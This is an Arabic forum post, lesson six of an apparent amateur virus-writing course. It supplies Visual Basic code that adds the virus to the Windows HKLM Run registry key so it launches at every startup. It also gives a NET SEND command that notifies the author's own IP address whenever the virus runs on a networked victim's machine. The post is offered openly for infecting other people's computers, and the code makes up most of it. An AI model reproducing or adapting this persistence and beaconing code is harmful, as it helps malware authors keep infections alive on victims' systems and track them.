الدرس السادس الدرس هذا مهم جدا اخواني الاعزاء هذا الدرس يعتبر خاص في الدورة لانه عندما طرحة الدورة لقد نسيت بعض الاشياء المهمة و يجب علي اكمالها و ان شاء الله في هذا الدرس سوف ابري ذمتي من اجل اكمال الدورة . 1.طريقة تشغيل الفيروس عند بدا التشغيل : سوف نستخدم لغة الفيجول بيسك و يجب على الشخص الذي يريد استخدام الكود لديه مستوى و لو فوق الوسط ليعرف وضع الكودات على كلاً يوجد كتاب و دورة الاستاذ الصقر الجراح يمكن من خلاالها تعلم الفيجول بيسك و انا انصح به المهم الان سوف اعطيكم الكودات و مناطق وضعها اما عن كيفية دمج الفيروس مع الفيجول فراجعوا الدرس الاول لمعرفة الطريقة الكاملة . كود PHP: كود بدا التشغيل : في الموديل : Option Explicit Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long Private Declare Function RegCreateKeyEx Lib "advapi32.dll" Alias "RegCreateKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal Reserved As Long, ByVal lpClass As String, ByVal dwOptions As Long, ByVal samDesired As Long, lpSecurityAttributes As Any, phkResult As Long, lpdwDisposition As Long) As Long Private Const READ_CONTROL = &H20000 Private Const KEY_QUERY_VALUE = &H1 Private Const KEY_SET_VALUE = &H2 Private Const KEY_CREATE_SUB_KEY = &H4 Private Const KEY_ENUMERATE_SUB_KEYS = &H8 Private Const KEY_NOTIFY = &H10 Private Const KEY_CREATE_LINK = &H20 Private Const KEY_READ = KEY_QUERY_VALUE + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + READ_CONTROL Private Const KEY_WRITE = KEY_SET_VALUE + KEY_CREATE_SUB_KEY + READ_CONTROL Private Const KEY_EXECUTE = KEY_READ Private Const KEY_ALL_ACCESS = KEY_QUERY_VALUE + KEY_SET_VALUE + KEY_CREATE_SUB_KEY + KEY_ENUMERATE_SUB_KEYS + KEY_NOTIFY + KEY_CREATE_LINK + READ_CONTROL Private Const RunPath = "Software\Microsoft\Windows\CurrentVersion\Run \" Private Const HKLM = &H80000002 ' استخدم الامر التالي لالغاء التشغيل التلقائي Public Sub DoNotRun(ProgramName As String) Dim hKey As Long Dim Ret As Long ' فتح المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) ' حذفها من مسجل النظام. Ret = RegDeleteValue(hKey, ProgramName) ' إغلاق المفتاح RegCloseKey hKey End Sub Public Sub RunWhenStartup(ProgramName As String, ProgramPath As String) Dim hKey As Long Dim Ret As Long ' فتح المفتاح المطلوب Ret = RegOpenKeyEx(HKLM, RunPath, 0, KEY_ALL_ACCESS, hKey) ' إنشاء قيمة جديدة بإسم البرنامج وعنوانه. Ret = RegSetValueEx(hKey, ProgramName, 0&, 1, ProgramPath, Len(ProgramPath)) 'LenB(StrConv(TheData, vbFromUnicode)) + 1) ' إغلاق المفتاح RegCloseKey hKey End Sub ------------ في الفورم : RunWhenStartup "عنوان", App.Path & "" & App.EXEName & ".exe" < /FONT > 2.كيفية التبليغ : (فقط في الشبكات) اعرف جيد جدا انه لا يوجد فيروس في العالم يحوي شيء اسمه تبليغ لاكن بعد الان سوف يوجد نعم اخواني هذه الطريقة المجربة و لا يوجد به اي خطا كود بسيط يعادل الف برامج قراصنة الانترنيت كل ما علينا فعله هو اضافة هذا السطر الى كود الفيروس مع تغير بعض الاشياء كاتالي : كود PHP: NET SEND 127.0.0.1 Run Virus Now الان سوف نجري بعض التغيرات Run Virus Now ضع الرسالة التي تريد ان تصلك و حتى لو في العربي 127.0.0.1 ضع رقم ip الخاص بك و سوف يتم ارسال الرسالة الى ip الخاص بك اذ لا تعرف ip يمكنك زيارة هذا الموقع و سوف يظهر الايبي مباشرة : showmyip.com - geospoofing your cyber presence
قوانين المنتدى